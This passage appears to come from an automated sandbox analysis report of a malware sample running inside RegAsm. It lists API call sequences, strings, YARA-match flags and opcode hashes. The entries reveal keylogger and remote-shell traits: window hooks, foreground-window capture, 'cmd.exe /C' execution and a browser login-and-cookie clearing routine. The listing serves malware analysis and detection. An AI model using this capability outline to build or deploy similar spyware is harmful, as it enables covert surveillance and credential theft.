                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHandleLibraryModule
                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                        • API String ID: 662261464-1276376045
                                                                                                                                        • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                        • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                                        • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                        • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                                        APIs
                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                                                                                        • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                                                                                        • SetForegroundWindow.USER32 ref: 00416CA8
                                                                                                                                          • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                                                                                                                                          • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                                                                          • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                                                          • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                                                                                        • String ID: !D@
                                                                                                                                        • API String ID: 186401046-604454484
                                                                                                                                        • Opcode ID: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                                                                                                                                        • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                                                                                                        • Opcode Fuzzy Hash: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                                                                                                                                        • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 10007153: GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                          • Part of subcall function 10007153: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                          • Part of subcall function 10007153: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                          • Part of subcall function 10007153: _free.LIBCMT ref: 100071B8
                                                                                                                                          • Part of subcall function 10007153: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                        • _free.LIBCMT ref: 10004F1D
                                                                                                                                        • _free.LIBCMT ref: 10004F24
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                        • String ID: pT$pT
                                                                                                                                        • API String ID: 400815659-1181007561
                                                                                                                                        • Opcode ID: e0fe51c550968720479aec1141248534f2a92988cecb2e3b51196d93947e3756
                                                                                                                                        • Instruction ID: eaf7f0aa003ddc14549942adb29436a4b3c466950eec5de4e21d931d64d8bd94
                                                                                                                                        • Opcode Fuzzy Hash: e0fe51c550968720479aec1141248534f2a92988cecb2e3b51196d93947e3756
                                                                                                                                        • Instruction Fuzzy Hash: 7BE0E5A6A0D99291F261D23D7D4265E1B45CBC12F5B230226FC249B1CBDDA4D801109D
                                                                                                                                        APIs
                                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExecuteShell
                                                                                                                                        • String ID: /C $cmd.exe$open
                                                                                                                                        • API String ID: 587946157-3896048727
                                                                                                                                        • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                                                        • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                                                                                        • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                                                        • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                                                                                        APIs
                                                                                                                                        • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,@0O,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                                                        • UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                                                        • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                        • String ID: pth_unenc
                                                                                                                                        • API String ID: 3123878439-4028850238
                                                                                                                                        • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                                                        • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                                                                                                        • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                                                        • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: GetCursorInfo$User32.dll
                                                                                                                                        • API String ID: 1646373207-2714051624
                                                                                                                                        • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                                                                        • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                                                                                                        • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                                                                        • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: GetLastInputInfo$User32.dll
                                                                                                                                        • API String ID: 2574300362-1519888992
                                                                                                                                        • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                                                                        • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                                                                                                        • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                                                                        • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1036877536-0
                                                                                                                                        • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                                                        • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                                                                                        • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                                                        • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                        • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                                                                        • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                                                                                        • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                                                                        • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                                                        • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                                                                                        • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                                                        • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                        • __freea.LIBCMT ref: 100087D5
                                                                                                                                          • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2652629310-0
                                                                                                                                        • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                        • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                        • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                        • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                                                                                        • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Sleep
                                                                                                                                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                                        • API String ID: 3472027048-1236744412
                                                                                                                                        • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                                                                        • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                                                                                                        • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                                                                        • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                                                                                                        APIs
                                                                                                                                        • EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
                                                                                                                                        • EnumDisplayDevicesW.USER32(?), ref: 00419560
                                                                                                                                        • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
                                                                                                                                        • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DisplayEnum$Devices$Monitors
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1432082543-0
                                                                                                                                        • Opcode ID: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                                                                                        • Instruction ID: 2d7c1ce958f8de7f9ce17d43b909e87ea7509c435c2805f0bc90a8abde121c81
                                                                                                                                        • Opcode Fuzzy Hash: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                                                                                        • Instruction Fuzzy Hash: 232180721083146BD221DF26DC89EABBBECEBD1754F00053FF45AD3190EB749A49C66A
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                                                                          • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                                                                                                                                          • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                                                                        • Sleep.KERNEL32(00000BB8), ref: 004127B5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpenQuerySleepValue
                                                                                                                                        • String ID: 8SG$@0O$exepath
                                                                                                                                        • API String ID: 4119054056-3553594606
                                                                                                                                        • Opcode ID: 2623c7753db8338a8ecc8f8a9aff935ef8b7f52fc7af967014f204662f36537b
                                                                                                                                        • Instruction ID: 51bf296395b05d3efeb7b41814c334b1d8e13e95dfba71b8de44539041ec8c28
                                                                                                                                        • Opcode Fuzzy Hash: 2623c7753db8338a8ecc8f8a9aff935ef8b7f52fc7af967014f204662f36537b
                                                                                                                                        • Instruction Fuzzy Hash: 3521F4A1B003042BD604B6365D4AAAF724D8B80318F40897FBA56E72D3DFBC9D45826D
                                                                                                                                        APIs
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseHandleReadSize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3642004256-0
                                                                                                                                        • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                        • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                                        • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                        • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                                                                                                                                          • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                                                                                          • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041C625
                                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$SleepText$ForegroundLength
                                                                                                                                        • String ID: [ $ ]
                                                                                                                                        • API String ID: 3309952895-93608704
                                                                                                                                        • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                                                                        • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                                                                                        • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                                                                        • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SystemTimes$Sleep__aulldiv
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 188215759-0
                                                                                                                                        • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                                                                                        • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                                                                                                                                        • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                                                                                        • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                                                                        • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                                                                                                        • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                                                                        • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                                                                        • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                                                                                        • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                                                                        • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                                                                                        APIs
                                                                                                                                        • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
